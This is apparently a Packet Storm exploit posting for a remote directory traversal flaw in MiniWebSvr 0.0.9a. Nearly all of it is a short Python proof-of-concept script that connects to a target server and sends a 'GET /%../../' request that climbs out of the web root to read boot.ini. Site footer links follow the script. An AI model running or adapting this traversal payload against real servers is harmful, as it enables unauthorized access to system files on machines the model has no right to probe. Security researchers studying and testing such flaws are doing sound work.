MiniWebSvr version 0.0.9a suffers from a remote directory traversal vulnerability.
0d0dfa2437a3154dc9625ff136839790eb37ef99e5b46c2129dd54e2040777dbimport socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed